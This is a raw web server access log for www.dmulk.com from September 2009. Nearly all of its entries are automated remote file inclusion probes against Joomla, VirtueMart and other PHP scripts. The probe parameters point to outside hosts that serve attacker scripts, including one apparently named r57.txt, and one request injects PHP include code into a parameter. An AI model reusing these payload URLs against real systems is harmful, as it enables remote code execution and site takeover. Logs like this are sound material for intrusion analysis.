217.160.7.67 - - [16/Sep/2009:12:23:02 -0700] "GET /logs/access_090519.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:23:02 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:23:04 -0700] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:23:10 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:23:10 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:12:23:12 -0700] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:23:12 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:23:13 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:23:13 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:23:13 -0700] "GET /logs/access_081026.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:23:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:23:16 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:23:16 -0700] "GET /logs/access_090505.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:23:19 -0700] "GET /logs/access_090326.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:23:25 -0700] "GET /logs/access_080111.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:23:54 -0700] "GET /logs/access_090505.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:23:54 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:23:54 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:24:05 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:24:05 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:24:06 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:24:09 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:24:15 -0700] "GET /logs/access_090514.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:12:24:19 -0700] "GET /logs/access_081017.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:12:24:48 -0700] "GET /logs/access_080916.log/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:54 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:54 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:54 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:55 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:55 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:55 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:58 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:58 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:24:58 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:25:00 -0700] "GET /logs/access_090903.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:00 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:01 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:01 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:01 -0700] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:01 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:01 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:01 -0700] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:02 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:02 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:04 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:04 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:04 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:04 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:04 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:04 -0700] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:05 -0700] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:05 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:05 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:25:05 -0700] "GET /logs/access_090423.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:07 -0700] "GET /logs/access_080423.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:07 -0700] "GET /logs/access_080423.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:09 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:09 -0700] "GET /logs/access_080423.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:25:09 -0700] "GET /logs/access_080423.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:25:12 -0700] "GET /logs/access_090714.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:25:12 -0700] "GET /logs/access_090403.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:25:23 -0700] "GET /logs/access_090410.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:25:26 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:25:26 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:25:26 -0700] "GET /logs/access_090519.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:25:44 -0700] "GET /logs/access_090423.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:25:44 -0700] "GET /logs/access_090714.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:26:03 -0700] "GET /logs/access_080905.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:26:07 -0700] "GET /logs/access_080219.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:26:08 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:26:09 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:26:14 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:26:14 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:26:16 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:26:16 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:26:26 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:26:27 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:26:34 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:27:00 -0700] "GET /logs//tools/send_reminders.php?includedir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:27:00 -0700] "GET /tools/send_reminders.php?includedir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:27:03 -0700] "GET /logs/access_080104.log//tools/send_reminders.php?includedir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:27:10 -0700] "GET /logs/access_080111.log//tools/send_reminders.php?includedir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:27:13 -0700] "GET /logs/access_080905.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:27:15 -0700] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.135.103.197 - - [16/Sep/2009:12:27:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.135.103.197 - - [16/Sep/2009:12:27:18 -0700] "GET /logs/access_090519.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.135.103.197 - - [16/Sep/2009:12:27:18 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:27:25 -0700] "GET /logs/access_090519.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:27:32 -0700] "GET /logs/access_081114.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:27:33 -0700] "GET /logs/access_090511.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:27:38 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:27:43 -0700] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:27:43 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:27:43 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:27:56 -0700] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:27:56 -0700] "GET /logs/access_080423.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:28:06 -0700] "GET /logs/access_080422.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:28:08 -0700] "GET /logs/access_090525.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:28:09 -0700] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:28:23 -0700] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:28:31 -0700] "GET /logs/access_080423.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:28:51 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:28:51 -0700] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:28:51 -0700] "GET /logs/access_090903.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:29:02 -0700] "GET /?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 200 19915 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:29:19 -0700] "GET /logs/access_090715.log HTTP/1.0" 200 2888130 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:29:43 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:29:43 -0700] "GET /logs/access_080327.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:29:43 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:29:48 -0700] "GET /logs/access_080529.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:30:01 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
